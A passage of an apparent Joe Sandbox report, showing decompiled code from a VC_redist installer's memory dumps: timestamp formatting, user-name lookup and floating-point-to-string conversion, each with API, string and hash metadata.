                                                                          					E00011F20(_t61, L"%04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u", _v24.wYear & 0x0000ffff);
                                                                          				} else {
                                                                          					_push(_t62->wSecond & 0x0000ffff);
                                                                          					_push(_t62->wMinute & 0x0000ffff);
                                                                          					_push(_t62->wHour & 0x0000ffff);
                                                                          					_push(_t62->wDay & 0x0000ffff);
                                                                          					_push(_t62->wMonth & 0x0000ffff);
                                                                          					E00011F20(_t61, L"%04hu-%02hu-%02huT%02hu:%02hu:%02huZ", _t62->wYear & 0x0000ffff);
                                                                          				}
                                                                          				return E0003DE36(_t54, _v8 ^ _t63, _t59, _t61, _t62);
                                                                          			}



















                                                                          APIs
                                                                          • GetTimeZoneInformation.KERNEL32(?,00000001,00000000), ref: 00058788
                                                                          • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?), ref: 0005879A
                                                                          Strings
                                                                          • crypt32.dll, xrefs: 00058758
                                                                          • %04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u, xrefs: 000587E3
                                                                          • %04hu-%02hu-%02huT%02hu:%02hu:%02huZ, xrefs: 00058771
                                                                          • feclient.dll, xrefs: 00058762
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Time$InformationLocalSpecificSystemZone
                                                                          • String ID: %04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u$%04hu-%02hu-%02huT%02hu:%02hu:%02huZ$crypt32.dll$feclient.dll
                                                                          • API String ID: 1772835396-1985132828
                                                                          • Opcode ID: 8532cbccf5f96fb7dfb2c3bcf232e832d9669f951fa1ab582914e7099287f4d7
                                                                          • Instruction ID: 896bdd48d1f9a4ae447357147174246e341ffbee0da6ac0e6ca5c7df3ebbba59
                                                                          • Opcode Fuzzy Hash: 8532cbccf5f96fb7dfb2c3bcf232e832d9669f951fa1ab582914e7099287f4d7
                                                                          • Instruction Fuzzy Hash: EC21FCA6900118BAE7249B959D05FBBB3FDEB48B12F10445AFA45E6080E738AD85D770
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 55%
                                                                          			E000160BA(void* __ebx, void* __edx, intOrPtr _a8) {
                                                                          				signed int _v8;
                                                                          				short _v524;
                                                                          				long _v528;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t8;
                                                                          				void* _t20;
                                                                          				void* _t25;
                                                                          				intOrPtr _t26;
                                                                          				void* _t27;
                                                                          				signed int _t30;
                                                                          
                                                                          				_t25 = __edx;
                                                                          				_t20 = __ebx;
                                                                          				_t8 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t8 ^ _t30;
                                                                          				_t26 = _a8;
                                                                          				_v528 = 0x101;
                                                                          				if(GetUserNameW( &_v524,  &_v528) != 0) {
                                                                          					L3:
                                                                          					_t27 = E000302F4(_t26,  &_v524, 0);
                                                                          					if(_t27 < 0) {
                                                                          						_push("Failed to set variant value.");
                                                                          						goto L5;
                                                                          					}
                                                                          				} else {
                                                                          					_t27 =  <=  ? GetLastError() : _t18 & 0x0000ffff | 0x80070000;
                                                                          					if(_t27 >= 0) {
                                                                          						goto L3;
                                                                          					} else {
                                                                          						E000137D3(_t18, "variable.cpp", 0x8e5, _t27);
                                                                          						_push("Failed to get the user name.");
                                                                          						L5:
                                                                          						_push(_t27);
                                                                          						E0005012F();
                                                                          					}
                                                                          				}
                                                                          				return E0003DE36(_t20, _v8 ^ _t30, _t25, _t26, _t27);
                                                                          			}
















                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastNameUser
                                                                          • String ID: @Met$Failed to get the user name.$Failed to set variant value.$variable.cpp
                                                                          • API String ID: 2054405381-1817914153
                                                                          • Opcode ID: 8545c92d065730bc1d31cb62ff59c9e1790551e7f202c6c324aba12a40dcde99
                                                                          • Instruction ID: 777b11d6309ed5790f5a26d54e457e24b6b8db3f6c6b27262498c51c663485b3
                                                                          • Opcode Fuzzy Hash: 8545c92d065730bc1d31cb62ff59c9e1790551e7f202c6c324aba12a40dcde99
                                                                          • Instruction Fuzzy Hash: 2101B972A013296BE721EB65DC09EEF77ACDF00721F10415AFC05E7282EE759E4886D1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 79%
                                                                          			E0004A85E(void* __ebx, signed int __edx, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
                                                                          				signed int _v0;
                                                                          				signed int _v8;
                                                                          				char _v460;
                                                                          				signed int _v464;
                                                                          				void _v468;
                                                                          				signed int _v472;
                                                                          				signed int _v932;
                                                                          				signed int _v936;
                                                                          				signed int _v1392;
                                                                          				signed int _v1396;
                                                                          				signed int _v1400;
                                                                          				char _v1860;
                                                                          				signed int _v1864;
                                                                          				signed int _v1865;
                                                                          				signed int _v1872;
                                                                          				signed int _v1876;
                                                                          				signed int _v1880;
                                                                          				signed int _v1884;
                                                                          				signed int _v1888;
                                                                          				signed int _v1892;
                                                                          				signed int _v1896;
                                                                          				intOrPtr _v1900;
                                                                          				signed int _v1904;
                                                                          				signed int _v1908;
                                                                          				signed int _v1912;
                                                                          				signed int _v1916;
                                                                          				signed int _v1920;
                                                                          				signed int _v1924;
                                                                          				signed int _v1928;
                                                                          				char _v1936;
                                                                          				char _v1944;
                                                                          				char _v2404;
                                                                          				signed int _v2408;
                                                                          				signed int _v2424;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t725;
                                                                          				signed int _t735;
                                                                          				signed int _t736;
                                                                          				signed int _t740;
                                                                          				intOrPtr _t742;
                                                                          				intOrPtr* _t743;
                                                                          				intOrPtr* _t746;
                                                                          				signed int _t751;
                                                                          				signed int _t752;
                                                                          				signed int _t758;
                                                                          				signed int _t764;
                                                                          				intOrPtr _t766;
                                                                          				void* _t767;
                                                                          				signed int _t768;
                                                                          				signed int _t769;
                                                                          				signed int _t770;
                                                                          				signed int _t778;
                                                                          				signed int _t779;
                                                                          				signed int _t782;
                                                                          				signed int _t783;
                                                                          				signed int _t784;
                                                                          				signed int _t787;
                                                                          				signed int _t788;
                                                                          				signed int _t789;
                                                                          				signed int _t791;
                                                                          				signed int _t792;
                                                                          				signed int _t793;
                                                                          				signed int _t794;
                                                                          				signed int _t799;
                                                                          				signed int _t800;
                                                                          				signed int _t805;
                                                                          				signed int _t806;
                                                                          				signed int _t809;
                                                                          				signed int _t813;
                                                                          				signed int _t820;
                                                                          				signed int* _t823;
                                                                          				signed int _t826;
                                                                          				signed int _t837;
                                                                          				signed int _t838;
                                                                          				signed int _t840;
                                                                          				char* _t841;
                                                                          				signed int _t843;
                                                                          				signed int _t847;
                                                                          				signed int _t848;
                                                                          				signed int _t852;
                                                                          				signed int _t854;
                                                                          				signed int _t859;
                                                                          				signed int _t867;
                                                                          				signed int _t870;
                                                                          				signed int _t872;
                                                                          				signed int _t875;
                                                                          				signed int _t876;
                                                                          				signed int _t877;
                                                                          				signed int _t880;
                                                                          				signed int _t893;
                                                                          				signed int _t894;
                                                                          				signed int _t896;
                                                                          				char* _t897;
                                                                          				signed int _t899;
                                                                          				signed int _t903;
                                                                          				signed int _t904;
                                                                          				signed int* _t906;
                                                                          				signed int _t908;
                                                                          				signed int _t910;
                                                                          				signed int _t915;
                                                                          				signed int _t922;
                                                                          				signed int _t925;
                                                                          				signed int _t929;
                                                                          				signed int* _t936;
                                                                          				intOrPtr _t938;
                                                                          				void* _t939;
                                                                          				intOrPtr* _t941;
                                                                          				signed int* _t945;
                                                                          				unsigned int _t956;
                                                                          				signed int _t957;
                                                                          				void* _t960;
                                                                          				signed int _t961;
                                                                          				void* _t963;
                                                                          				signed int _t964;
                                                                          				signed int _t965;
                                                                          				signed int _t966;
                                                                          				signed int _t974;
                                                                          				signed int _t979;
                                                                          				signed int _t982;
                                                                          				unsigned int _t985;
                                                                          				signed int _t986;
                                                                          				void* _t989;
                                                                          				signed int _t990;
                                                                          				void* _t992;
                                                                          				signed int _t993;
                                                                          				signed int _t994;
                                                                          				signed int _t995;
                                                                          				signed int _t999;
                                                                          				signed int* _t1004;
                                                                          				signed int _t1006;
                                                                          				signed int _t1016;
                                                                          				void* _t1017;
                                                                          				void _t1019;
                                                                          				signed int _t1022;
                                                                          				void* _t1025;
                                                                          				signed int _t1036;
                                                                          				signed int _t1037;
                                                                          				signed int _t1040;
                                                                          				signed int _t1041;
                                                                          				signed int _t1043;
                                                                          				signed int _t1044;
                                                                          				signed int _t1045;
                                                                          				signed int _t1049;
                                                                          				signed int _t1053;
                                                                          				signed int _t1054;
                                                                          				signed int _t1055;
                                                                          				signed int _t1057;
                                                                          				signed int _t1058;
                                                                          				signed int _t1059;
                                                                          				signed int _t1060;
                                                                          				signed int _t1061;
                                                                          				signed int _t1062;
                                                                          				signed int _t1064;
                                                                          				signed int _t1065;
                                                                          				signed int _t1066;
                                                                          				signed int _t1067;
                                                                          				signed int _t1068;
                                                                          				signed int _t1069;
                                                                          				unsigned int _t1070;
                                                                          				void* _t1073;
                                                                          				intOrPtr _t1075;
                                                                          				signed int _t1076;
                                                                          				signed int _t1077;
                                                                          				signed int _t1078;
                                                                          				signed int* _t1082;
                                                                          				void* _t1086;
                                                                          				void* _t1087;
                                                                          				signed int _t1088;
                                                                          				signed int _t1089;
                                                                          				signed int _t1090;
                                                                          				signed int _t1093;
                                                                          				signed int _t1094;
                                                                          				signed int _t1099;
                                                                          				signed int _t1101;
                                                                          				signed int _t1102;
                                                                          				signed int _t1110;
                                                                          				signed int _t1111;
                                                                          				signed int _t1112;
                                                                          				signed int _t1113;
                                                                          				signed int _t1114;
                                                                          				signed int _t1115;
                                                                          				signed int _t1116;
                                                                          				signed int _t1120;
                                                                          				signed int _t1121;
                                                                          				signed int _t1122;
                                                                          				signed int _t1123;
                                                                          				signed int _t1124;
                                                                          				unsigned int _t1127;
                                                                          				void* _t1131;
                                                                          				void* _t1132;
                                                                          				unsigned int _t1133;
                                                                          				signed int _t1138;
                                                                          				signed int _t1139;
                                                                          				signed int _t1141;
                                                                          				signed int _t1142;
                                                                          				intOrPtr* _t1144;
                                                                          				signed int _t1145;
                                                                          				signed int _t1146;
                                                                          				void* _t1148;
                                                                          				signed int _t1149;
                                                                          				signed int _t1150;
                                                                          				signed int _t1153;
                                                                          				signed int _t1155;
                                                                          				signed int _t1156;
                                                                          				void* _t1157;
                                                                          				signed int _t1158;
                                                                          				signed int _t1159;
                                                                          				signed int _t1160;
                                                                          				void* _t1163;
                                                                          				signed int _t1164;
                                                                          				signed int _t1165;
                                                                          				signed int _t1166;
                                                                          				signed int _t1167;
                                                                          				signed int _t1168;
                                                                          				signed int* _t1171;
                                                                          				signed int _t1172;
                                                                          				signed int _t1173;
                                                                          				signed int _t1174;
                                                                          				signed int _t1175;
                                                                          				intOrPtr* _t1177;
                                                                          				intOrPtr* _t1178;
                                                                          				signed int _t1180;
                                                                          				signed int _t1182;
                                                                          				signed int _t1185;
                                                                          				signed int _t1191;
                                                                          				signed int _t1195;
                                                                          				signed int _t1196;
                                                                          				intOrPtr _t1198;
                                                                          				intOrPtr _t1199;
                                                                          				void* _t1200;
                                                                          				signed int _t1204;
                                                                          				signed int _t1207;
                                                                          				signed int _t1208;
                                                                          				signed int _t1209;
                                                                          				signed int _t1210;
                                                                          				signed int _t1211;
                                                                          				signed int _t1212;
                                                                          				signed int _t1214;
                                                                          				signed int _t1215;
                                                                          				signed int _t1216;
                                                                          				signed int _t1217;
                                                                          				signed int _t1219;
                                                                          				signed int _t1220;
                                                                          				signed int _t1221;
                                                                          				signed int _t1222;
                                                                          				signed int _t1223;
                                                                          				signed int _t1225;
                                                                          				signed int _t1226;
                                                                          				signed int _t1228;
                                                                          				signed int _t1230;
                                                                          				signed int _t1232;
                                                                          				signed int _t1234;
                                                                          				signed int* _t1236;
                                                                          				signed int* _t1240;
                                                                          				signed int _t1249;
                                                                          
                                                                          				_t1101 = __edx;
                                                                          				_t725 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t725 ^ _t1234;
                                                                          				_push(__ebx);
                                                                          				_t1016 = _a20;
                                                                          				_t1144 = _a16;
                                                                          				_v1924 = _t1144;
                                                                          				_v1920 = _t1016;
                                                                          				E0004A37D( &_v1944, __eflags);
                                                                          				_t1195 = _a8;
                                                                          				_t730 = 0x2d;
                                                                          				if((_t1195 & 0x80000000) == 0) {
                                                                          					_t730 = 0x120;
                                                                          				}
                                                                          				 *_t1144 = _t730;
                                                                          				 *((intOrPtr*)(_t1144 + 8)) = _t1016;
                                                                          				_t1145 = _a4;
                                                                          				if((_t1195 & 0x7ff00000) != 0) {
                                                                          					L5:
                                                                          					_t735 = E000469EC( &_a4);
                                                                          					_pop(_t1031);
                                                                          					__eflags = _t735;
                                                                          					if(_t735 != 0) {
                                                                          						_t1031 = _v1924;
                                                                          						 *((intOrPtr*)(_v1924 + 4)) = 1;
                                                                          					}
                                                                          					_t736 = _t735 - 1;
                                                                          					__eflags = _t736;
                                                                          					if(_t736 == 0) {
                                                                          						_push("1#INF");
                                                                          						goto L308;
                                                                          					} else {
                                                                          						_t751 = _t736 - 1;
                                                                          						__eflags = _t751;
                                                                          						if(_t751 == 0) {
                                                                          							_push("1#QNAN");
                                                                          							goto L308;
                                                                          						} else {
                                                                          							_t752 = _t751 - 1;
                                                                          							__eflags = _t752;
                                                                          							if(_t752 == 0) {
                                                                          								_push("1#SNAN");
                                                                          								goto L308;
                                                                          							} else {
                                                                          								__eflags = _t752 == 1;
                                                                          								if(_t752 == 1) {
                                                                          									_push("1#IND");
                                                                          									goto L308;
                                                                          								} else {
                                                                          									_v1928 = _v1928 & 0x00000000;
                                                                          									_a4 = _t1145;
                                                                          									_a8 = _t1195 & 0x7fffffff;
                                                                          									_t1249 = _a4;
                                                                          									asm("fst qword [ebp-0x768]");
                                                                          									_t1149 = _v1896;
                                                                          									_v1916 = _a12 + 1;
                                                                          									_t1036 = _t1149 >> 0x14;
                                                                          									_t758 = _t1036 & 0x000007ff;
                                                                          									__eflags = _t758;
                                                                          									if(_t758 != 0) {
                                                                          										_t1102 = 0;
                                                                          										_t758 = 0;
                                                                          										__eflags = 0;
                                                                          									} else {
                                                                          										_t1102 = 1;
                                                                          									}
                                                                          									_t1150 = _t1149 & 0x000fffff;
                                                                          									_t1019 = _v1900 + _t758;
                                                                          									asm("adc edi, esi");
                                                                          									__eflags = _t1102;
                                                                          									_t1037 = _t1036 & 0x000007ff;
                                                                          									_t1204 = _t1037 - 0x434 + (0 | _t1102 != 0x00000000) + 1;
                                                                          									_v1872 = _t1204;
                                                                          									E0004C790(_t1037, _t1249);
                                                                          									_push(_t1037);
                                                                          									_push(_t1037);
                                                                          									 *_t1236 = _t1249;
                                                                          									_t764 = E00059E40(E0004C8A0(), _t1249);
                                                                          									_v1904 = _t764;
                                                                          									__eflags = _t764 - 0x7fffffff;
                                                                          									if(_t764 == 0x7fffffff) {
                                                                          										L16:
                                                                          										__eflags = 0;
                                                                          										_v1904 = 0;
                                                                          									} else {
                                                                          										__eflags = _t764 - 0x80000000;
                                                                          										if(_t764 == 0x80000000) {
                                                                          											goto L16;
                                                                          										}
                                                                          									}
                                                                          									_v468 = _t1019;
                                                                          									__eflags = _t1150;
                                                                          									_v464 = _t1150;
                                                                          									_t1022 = (0 | _t1150 != 0x00000000) + 1;
                                                                          									_v472 = _t1022;
                                                                          									__eflags = _t1204;
                                                                          									if(_t1204 < 0) {
                                                                          										__eflags = _t1204 - 0xfffffc02;
                                                                          										if(_t1204 == 0xfffffc02) {
                                                                          											L101:
                                                                          											_t766 =  *((intOrPtr*)(_t1234 + _t1022 * 4 - 0x1d4));
                                                                          											_t195 =  &_v1896;
                                                                          											 *_t195 = _v1896 & 0x00000000;
                                                                          											__eflags =  *_t195;
                                                                          											asm("bsr eax, eax");
                                                                          											if( *_t195 == 0) {
                                                                          												_t1040 = 0;
                                                                          												__eflags = 0;
                                                                          											} else {
                                                                          												_t1040 = _t766 + 1;
                                                                          											}
                                                                          											_t767 = 0x20;
                                                                          											_t768 = _t767 - _t1040;
                                                                          											__eflags = _t768 - 1;
                                                                          											_t769 = _t768 & 0xffffff00 | _t768 - 0x00000001 > 0x00000000;
                                                                          											__eflags = _t1022 - 0x73;
                                                                          											_v1865 = _t769;
                                                                          											_t1041 = _t1040 & 0xffffff00 | _t1022 - 0x00000073 > 0x00000000;
                                                                          											__eflags = _t1022 - 0x73;
                                                                          											if(_t1022 != 0x73) {
                                                                          												L107:
                                                                          												_t770 = 0;
                                                                          												__eflags = 0;
                                                                          											} else {
                                                                          												__eflags = _t769;
                                                                          												if(_t769 == 0) {
                                                                          													goto L107;
                                                                          												} else {
                                                                          													_t770 = 1;
                                                                          												}
                                                                          											}
                                                                          											__eflags = _t1041;
                                                                          											if(_t1041 != 0) {
                                                                          												L126:
                                                                          												_v1400 = _v1400 & 0x00000000;
                                                                          												_t224 =  &_v472;
                                                                          												 *_t224 = _v472 & 0x00000000;
                                                                          												__eflags =  *_t224;
                                                                          												_push(0);
                                                                          												_push( &_v1396);
                                                                          												_push(0x1cc);
                                                                          												_push( &_v468);
                                                                          												L313();
                                                                          												_t1236 =  &(_t1236[4]);
                                                                          											} else {
                                                                          												__eflags = _t770;
                                                                          												if(_t770 != 0) {
                                                                          													goto L126;
                                                                          												} else {
                                                                          													_t1068 = 0x72;
                                                                          													__eflags = _t1022 - _t1068;
                                                                          													if(_t1022 < _t1068) {
                                                                          														_t1068 = _t1022;
                                                                          													}
                                                                          													__eflags = _t1068 - 0xffffffff;
                                                                          													if(_t1068 != 0xffffffff) {
                                                                          														_t1222 = _t1068;
                                                                          														_t1177 =  &_v468 + _t1068 * 4;
                                                                          														_v1880 = _t1177;
                                                                          														while(1) {
                                                                          															__eflags = _t1222 - _t1022;
                                                                          															if(_t1222 >= _t1022) {
                                                                          																_t208 =  &_v1876;
                                                                          																 *_t208 = _v1876 & 0x00000000;
                                                                          																__eflags =  *_t208;
                                                                          															} else {
                                                                          																_v1876 =  *_t1177;
                                                                          															}
                                                                          															_t210 = _t1222 - 1; // 0x70
                                                                          															__eflags = _t210 - _t1022;
                                                                          															if(_t210 >= _t1022) {
                                                                          																_t1127 = 0;
                                                                          																__eflags = 0;
                                                                          															} else {
                                                                          																_t1127 =  *(_t1177 - 4);
                                                                          															}
                                                                          															_t1177 = _t1177 - 4;
                                                                          															_t936 = _v1880;
                                                                          															_t1222 = _t1222 - 1;
                                                                          															 *_t936 = _t1127 >> 0x0000001f ^ _v1876 + _v1876;
                                                                          															_v1880 = _t936 - 4;
                                                                          															__eflags = _t1222 - 0xffffffff;
                                                                          															if(_t1222 == 0xffffffff) {
                                                                          																break;
                                                                          															}
                                                                          															_t1022 = _v472;
                                                                          														}
                                                                          														_t1204 = _v1872;
                                                                          													}
                                                                          													__eflags = _v1865;
                                                                          													if(_v1865 == 0) {
                                                                          														_v472 = _t1068;
                                                                          													} else {
                                                                          														_t218 = _t1068 + 1; // 0x73
                                                                          														_v472 = _t218;
                                                                          													}
                                                                          												}
                                                                          											}
                                                                          											_t1153 = 1 - _t1204;
                                                                          											E0003F670(_t1153,  &_v1396, 0, 1);
                                                                          											__eflags = 1;
                                                                          											 *(_t1234 + 0xbad63d) = 1 << (_t1153 & 0x0000001f);
                                                                          											_t778 = 0xbadbae;
                                                                          										} else {
                                                                          											_v1396 = _v1396 & 0x00000000;
                                                                          											_t1069 = 2;
                                                                          											_v1392 = 0x100000;
                                                                          											_v1400 = _t1069;
                                                                          											__eflags = _t1022 - _t1069;
                                                                          											if(_t1022 == _t1069) {
                                                                          												_t1131 = 0;
                                                                          												__eflags = 0;
                                                                          												while(1) {
                                                                          													_t938 =  *((intOrPtr*)(_t1234 + _t1131 - 0x570));
                                                                          													__eflags = _t938 -  *((intOrPtr*)(_t1234 + _t1131 - 0x1d0));
                                                                          													if(_t938 !=  *((intOrPtr*)(_t1234 + _t1131 - 0x1d0))) {
                                                                          														goto L101;
                                                                          													}
                                                                          													_t1131 = _t1131 + 4;
                                                                          													__eflags = _t1131 - 8;
                                                                          													if(_t1131 != 8) {
                                                                          														continue;
                                                                          													} else {
                                                                          														_t166 =  &_v1896;
                                                                          														 *_t166 = _v1896 & 0x00000000;
                                                                          														__eflags =  *_t166;
                                                                          														asm("bsr eax, edi");
                                                                          														if( *_t166 == 0) {
                                                                          															_t1132 = 0;
                                                                          															__eflags = 0;
                                                                          														} else {
                                                                          															_t1132 = _t938 + 1;
                                                                          														}
                                                                          														_t939 = 0x20;
                                                                          														_t1223 = _t1069;
                                                                          														__eflags = _t939 - _t1132 - _t1069;
                                                                          														_t941 =  &_v460;
                                                                          														_v1880 = _t941;
                                                                          														_t1178 = _t941;
                                                                          														_t171 =  &_v1865;
                                                                          														 *_t171 = _t939 - _t1132 - _t1069 > 0;
                                                                          														__eflags =  *_t171;
                                                                          														while(1) {
                                                                          															__eflags = _t1223 - _t1022;
                                                                          															if(_t1223 >= _t1022) {
                                                                          																_t173 =  &_v1876;
                                                                          																 *_t173 = _v1876 & 0x00000000;
                                                                          																__eflags =  *_t173;
                                                                          															} else {
                                                                          																_v1876 =  *_t1178;
                                                                          															}
                                                                          															_t175 = _t1223 - 1; // 0x0
                                                                          															__eflags = _t175 - _t1022;
                                                                          															if(_t175 >= _t1022) {
                                                                          																_t1133 = 0;
                                                                          																__eflags = 0;
                                                                          															} else {
                                                                          																_t1133 =  *(_t1178 - 4);
                                                                          															}
                                                                          															_t1178 = _t1178 - 4;
                                                                          															_t945 = _v1880;
                                                                          															_t1223 = _t1223 - 1;
                                                                          															 *_t945 = _t1133 >> 0x0000001e ^ _v1876 << 0x00000002;
                                                                          															_v1880 = _t945 - 4;
                                                                          															__eflags = _t1223 - 0xffffffff;
                                                                          															if(_t1223 == 0xffffffff) {
                                                                          																break;
                                                                          															}
                                                                          															_t1022 = _v472;
                                                                          														}
                                                                          														__eflags = _v1865;
                                                                          														_t1070 = _t1069 - _v1872;
                                                                          														_v472 = (0 | _v1865 != 0x00000000) + _t1069;
                                                                          														_t1180 = _t1070 >> 5;
                                                                          														_v1884 = _t1070;
                                                                          														_t1225 = _t1180 << 2;
                                                                          														E0003F670(_t1180,  &_v1396, 0, _t1225);
                                                                          														 *(_t1234 + _t1225 - 0x570) = 1 << (_v1884 & 0x0000001f);
                                                                          														_t778 = _t1180 + 1;
                                                                          													}
                                                                          													goto L128;
                                                                          												}
                                                                          											}
                                                                          											goto L101;
                                                                          										}
                                                                          										L128:
                                                                          										_v1400 = _t778;
                                                                          										_t1025 = 0x1cc;
                                                                          										_v936 = _t778;
                                                                          										_t779 = _t778 << 2;
                                                                          										__eflags = _t779;
                                                                          										_push(_t779);
                                                                          										_push( &_v1396);
                                                                          										_push(0x1cc);
                                                                          										_push( &_v932);
                                                                          										L313();
                                                                          										_t1240 =  &(_t1236[7]);
                                                                          									} else {
                                                                          										_v1396 = _v1396 & 0x00000000;
                                                                          										_t1226 = 2;
                                                                          										_v1392 = 0x100000;
                                                                          										_v1400 = _t1226;
                                                                          										__eflags = _t1022 - _t1226;
                                                                          										if(_t1022 != _t1226) {
                                                                          											L53:
                                                                          											_t956 = _v1872 + 1;
                                                                          											_t957 = _t956 & 0x0000001f;
                                                                          											_t1073 = 0x20;
                                                                          											_v1876 = _t957;
                                                                          											_t1182 = _t956 >> 5;
                                                                          											_v1872 = _t1182;
                                                                          											_v1908 = _t1073 - _t957;
                                                                          											_t960 = E00059E20(1, _t1073 - _t957, 0);
                                                                          											_t1075 =  *((intOrPtr*)(_t1234 + _t1022 * 4 - 0x1d4));
                                                                          											_t961 = _t960 - 1;
                                                                          											_t108 =  &_v1896;
                                                                          											 *_t108 = _v1896 & 0x00000000;
                                                                          											__eflags =  *_t108;
                                                                          											asm("bsr ecx, ecx");
                                                                          											_v1884 = _t961;
                                                                          											_v1912 =  !_t961;
                                                                          											if( *_t108 == 0) {
                                                                          												_t1076 = 0;
                                                                          												__eflags = 0;
                                                                          											} else {
                                                                          												_t1076 = _t1075 + 1;
                                                                          											}
                                                                          											_t963 = 0x20;
                                                                          											_t964 = _t963 - _t1076;
                                                                          											_t1138 = _t1022 + _t1182;
                                                                          											__eflags = _v1876 - _t964;
                                                                          											_v1892 = _t1138;
                                                                          											_t965 = _t964 & 0xffffff00 | _v1876 - _t964 > 0x00000000;
                                                                          											__eflags = _t1138 - 0x73;
                                                                          											_v1865 = _t965;
                                                                          											_t1077 = _t1076 & 0xffffff00 | _t1138 - 0x00000073 > 0x00000000;
                                                                          											__eflags = _t1138 - 0x73;
                                                                          											if(_t1138 != 0x73) {
                                                                          												L59:
                                                                          												_t966 = 0;
                                                                          												__eflags = 0;
                                                                          											} else {
                                                                          												__eflags = _t965;
                                                                          												if(_t965 == 0) {
                                                                          													goto L59;
                                                                          												} else {
                                                                          													_t966 = 1;
                                                                          												}
                                                                          											}
                                                                          											__eflags = _t1077;
                                                                          											if(_t1077 != 0) {
                                                                          												L81:
                                                                          												__eflags = 0;
                                                                          												_t1025 = 0x1cc;
                                                                          												_push(0);
                                                                          												_v1400 = 0;
                                                                          												_v472 = 0;
                                                                          												_push( &_v1396);
                                                                          												_push(0x1cc);
                                                                          												_push( &_v468);
                                                                          												L313();
                                                                          												_t1236 =  &(_t1236[4]);
                                                                          											} else {
                                                                          												__eflags = _t966;
                                                                          												if(_t966 != 0) {
                                                                          													goto L81;
                                                                          												} else {
                                                                          													_t1078 = 0x72;
                                                                          													__eflags = _t1138 - _t1078;
                                                                          													if(_t1138 >= _t1078) {
                                                                          														_t1138 = _t1078;
                                                                          														_v1892 = _t1078;
                                                                          													}
                                                                          													_t974 = _t1138;
                                                                          													_v1880 = _t974;
                                                                          													__eflags = _t1138 - 0xffffffff;
                                                                          													if(_t1138 != 0xffffffff) {
                                                                          														_t1139 = _v1872;
                                                                          														_t1228 = _t1138 - _t1139;
                                                                          														__eflags = _t1228;
                                                                          														_t1082 =  &_v468 + _t1228 * 4;
                                                                          														_v1888 = _t1082;
                                                                          														while(1) {
                                                                          															__eflags = _t974 - _t1139;
                                                                          															if(_t974 < _t1139) {
                                                                          																break;
                                                                          															}
                                                                          															__eflags = _t1228 - _t1022;
                                                                          															if(_t1228 >= _t1022) {
                                                                          																_t1185 = 0;
                                                                          																__eflags = 0;
                                                                          															} else {
                                                                          																_t1185 =  *_t1082;
                                                                          															}
                                                                          															__eflags = _t1228 - 1 - _t1022;
                                                                          															if(_t1228 - 1 >= _t1022) {
                                                                          																_t979 = 0;
                                                                          																__eflags = 0;
                                                                          															} else {
                                                                          																_t979 =  *(_t1082 - 4);
                                                                          															}
                                                                          															_t982 = _v1880;
                                                                          															_t1082 = _v1888 - 4;
                                                                          															_v1888 = _t1082;
                                                                          															 *(_t1234 + _t982 * 4 - 0x1d0) = (_t1185 & _v1884) << _v1876 | (_t979 & _v1912) >> _v1908;
                                                                          															_t974 = _t982 - 1;
                                                                          															_t1228 = _t1228 - 1;
                                                                          															_v1880 = _t974;
                                                                          															__eflags = _t974 - 0xffffffff;
                                                                          															if(_t974 != 0xffffffff) {
                                                                          																_t1022 = _v472;
                                                                          																continue;
                                                                          															}
                                                                          															break;
                                                                          														}
                                                                          														_t1138 = _v1892;
                                                                          														_t1182 = _v1872;
                                                                          														_t1226 = 2;
                                                                          													}
                                                                          													__eflags = _t1182;
                                                                          													if(_t1182 != 0) {
                                                                          														__eflags = 0;
                                                                          														memset( &_v468, 0, _t1182 << 2);
                                                                          														_t1236 =  &(_t1236[3]);
                                                                          													}
                                                                          													__eflags = _v1865;
                                                                          													_t1025 = 0x1cc;
                                                                          													if(_v1865 == 0) {
                                                                          														_v472 = _t1138;
                                                                          													} else {
                                                                          														_v472 = _t1138 + 1;
                                                                          													}
                                                                          												}
                                                                          											}
                                                                          											_v1392 = _v1392 & 0x00000000;
                                                                          											_v1396 = _t1226;
                                                                          											_v1400 = 1;
                                                                          											_v936 = 1;
                                                                          											_push(4);
                                                                          										} else {
                                                                          											_t1086 = 0;
                                                                          											__eflags = 0;
                                                                          											while(1) {
                                                                          												__eflags =  *((intOrPtr*)(_t1234 + _t1086 - 0x570)) -  *((intOrPtr*)(_t1234 + _t1086 - 0x1d0));
